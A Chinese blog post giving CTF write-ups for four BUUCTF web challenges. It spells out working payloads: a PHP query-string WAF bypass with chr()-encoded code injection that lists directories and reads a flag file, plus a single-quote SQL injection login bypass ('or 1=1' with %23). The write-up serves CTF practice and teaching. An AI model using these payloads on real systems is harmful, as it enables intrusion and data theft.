Web-2(5-8)-BUUCTF平台

最新推荐文章于 2023-06-16 11:18:48 发布
最新推荐文章于 2023-06-16 11:18:48 发布
阅读量3.4k 收藏 1
点赞数 1
分类专栏: CTF BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiachang/article/details/105411604
版权
CTF 同时被 2 个专栏收录
28 篇文章 7 订阅
订阅专栏
BUUCTF
19 篇文章 1 订阅
订阅专栏

本篇内容:
[HCTF 2018]admin
[RoarCTF 2019]Easy Calc
[极客大挑战 2019]EasySQL
[极客大挑战 2019]Havefun

上一篇 | 目录 | 下一篇


[HCTF 2018]admin

本题难度对我来讲还是挺大的,虽然自己会了,但由于对flask模板注入理解不深刻,讲解不好,直接放一位大佬写的WP:HCTF2018-admin



[RoarCTF 2019]Easy Calc

访问网址:
在这里插入图片描述
查看网页源代码,发现如下内容:
在这里插入图片描述
访问calc.php
在这里插入图片描述
发现给num参数传正常算式可以,但是传字母就不行了,肯定是WAF搞的鬼。
在这里插入图片描述
在这里插入图片描述
这里利用PHP的字符串解析特性来绕过WAF。
PHP查询字符串在解析的过程中会将某些字符删除或用下划线代替。对于空白符就是删除。
这里WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF。例如:

calc.php? num=phpinfo();

在这里插入图片描述
发现phpinfo();解析成功,那么就看一下根目录下有什么东西,就要用到scandir(),构造payload:

? num=print_r(scandir('/'));
这里由于单引号被过滤了,那就用chr()绕过,chr(47)就是斜杠/
? num=print_r(scandir(chr(47)));

在这里插入图片描述
接着读取flagg文件即可,构造payload:

? num=print_r(file_get_contents('/flagg'));
这里/=chr(47),f=chr(102),l=chr(49),a=chr(97),g=chr(103),g=chr(103)来进行绕过
? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

在这里插入图片描述
拿到最终flag。



[极客大挑战 2019]EasySQL

访问网址,尝试登录

check.php?username=admin&password=123

在这里插入图片描述
显示用户名密码错误。尝试单引号注入发现报错:

check.php?username=admin'&password=123

在这里插入图片描述
尝试后发现后加%23回显就又正常了,%23即#,这里需编码后使用。

check.php?username=admin'%23&password=123

在这里插入图片描述
尝试万能密码 or 1=1,发现就得到了flag。
在这里插入图片描述




[极客大挑战 2019]Havefun

直接查看源代码发现:
在这里插入图片描述
直接尝试一下 ?cat=dog发现出来了flag,贼懵逼的就拿到了flag。
在这里插入图片描述




========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105411604
========================================================

airrudder
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web-app_2_4.xsd
06-08
web-app_2_4.xsd。。。。。。。。。。。。。。。。。。。
BUUCTF平台-web-(WarmUp+easy_tornado+随便注)记录-day1
weixin_30765475的博客
07-24 268
1.WarmUp 思路很清晰,文件包含,漏洞点在代码会二次解码,只需注入一个?就可以使用../../进行路径穿越,然后去包含flag,flag路径在hint.php里面有 2.easy_tornado 题目就给了这些信息,flag路径已知,render应该是跟模板注入相关,hint.txt给的应该是filehash的算法, 看看url,我们可以控制文件名和文件hash ...
BUUCTF——Basic
计算机硕士的博客
06-16 1362
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
Web-6(21-24)-BUUCTF平台
~airrudder~
04-10 3650
本篇内容 [RoarCTF 2019]Easy Java [极客大挑战 2019]BabySQL [ZJCTF 2019]NiZhuanSiWei [极客大挑战 2019]BuyFlag 上一篇 | 目录 | 下一篇 [RoarCTF 2019]Easy Java 开头一个登录框,使用用户名为admin,密码为admin888登录成功发现提示flag不在这里(至于猜不到admin888倒是可...
Web-14(53-56)-BUUCTF平台
~airrudder~
09-08 751
上一篇 | 目录 | 下一篇 文章目录[BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]假猪套天下第一 ======================================================== 上一篇-----------------------------------目录 -----------------------------------下一篇 =======================================================
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 5458
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF平台-web-边刷边记录-2
weixin_30376453的博客
08-13 576
1.one line tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_fil...
BUUCTF snake(实验吧Snake)
ChanCherry的博客
08-13 4972
题目表面上给的是一张jpg图片,但是binwalk一下,里面有压缩包,binwalk snake.jpg -e解压一下, 里面有两个文件,一个key,一个cipher,打开key,有一串base64字符, V2hhdCBpcyBOaWNraSBNaW5haidzIGZhdm9yaXRlIHNvbmcgdGhhdCByZWZlcnMgdG8gc25ha2VzPwo= 解码之后,得到: What ...
BUU_CTF
DUOan0216的博客
07-29 522
png 格式的长宽高可以用winhex更改 一、N种方法解决 尝试性的打开这个.exe 文件,结果打不开(歪头) 然后开winhex看一下: 好好看一下 应该是用base64 加密的图片 在解码的工具里把winhex所有的东西复制过去 得到二维码。QR解码顺利得到:KEY{dca57f966e4e4e31fd5b15417da63269} 二、LSB 显然最低有效位问题 开stegsolve...
BUUCTF平台web writeup
a370793934的专栏
11-28 1432
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
ros2-web-bridge:将浏览器桥接到ROS 2.0
04-27
ros2-web-bridgerosbridge v2协议的服务器实现ros2-web-bridge利用客户端,通过采用为提供JSON接口。 该网桥可以通过WebSockets上的JSON处理命令。ROS 2支持该ros2幅桥默认支持(目前最新的ROS 2的稳定版本 ),请...
spring-web-5.0.4.RELEASE.jar
03-21
spring-web-5.0.4.RELEASE.jar; spring-web-5.0.4.RELEASE.jar
webssh2-master.zip
12-19
webssh-master.zipwebssh-master.zip
CTF刷题-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
部分WP-GKCTF2020
~airrudder~
05-24 6150
本篇内容 MISC: [GKCTF2020]签到 [GKCTF2020]Pokémon [GKCTF2020]问卷调查 [GKCTF2020]code obfuscation Crypto: [GKCTF2020]小学生的密码学 [GKCTF2020]汉字的秘密 [GKCTF2020]babycrypto Web: [GKCTF2020]CheckIN [GKCTF2020]老八小超市儿 Reverse: [GKCTF2020]Check_1n 上一篇 | 目录 | 下一篇 [GKC.
Web-4(13-16)-BUUCTF平台
~airrudder~
04-10 5493
本篇内容 [网鼎杯 2018]Fakebook [极客大挑战 2019]PHP [极客大挑战 2019]Knife [BJDCTF 2nd]fake google 上一篇 | 目录 | 下一篇 [网鼎杯 2018]Fakebook [极客大挑战 2019]PHP [极客大挑战 2019]Knife [BJDCTF 2nd]fake google =====================...
Web-7(25-28)-BUUCTF平台
~airrudder~
04-11 5079
本篇内容 [BJDCTF 2nd]old-hack [BUUCTF 2018]Online Tool [0CTF 2016]piapiapia [ACTF2020 新生赛]Include 上一篇 | 目录 | 下一篇 [BJDCTF 2nd]old-hack 发现是thinkphp5漏洞,使用Kali查一下漏洞利用方法: 我们查看一下最新的那个46150.txt,看看是否可以利用,在ka...
FCTF公开赛 F1A4安全成立一周年庆典赛(4月5号)
~airrudder~
04-06 4341
比赛期间做出题目的WP。 Reverse RE1—签到 IDA64打开,直接出flag。 RE2—babyRE 010编辑器一看是png的头,直接改后缀出现下图: 看PS处,“ZG9uJ3Q=”的base64解码为don’t,ZG8=的base64解码为do。 即将图片的dont改为do即可,即flag为FCTF{I_do_like_it}。 RE3—EZre 需要密码解密,010打开找到是伪...
buuctf web
最新发布
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值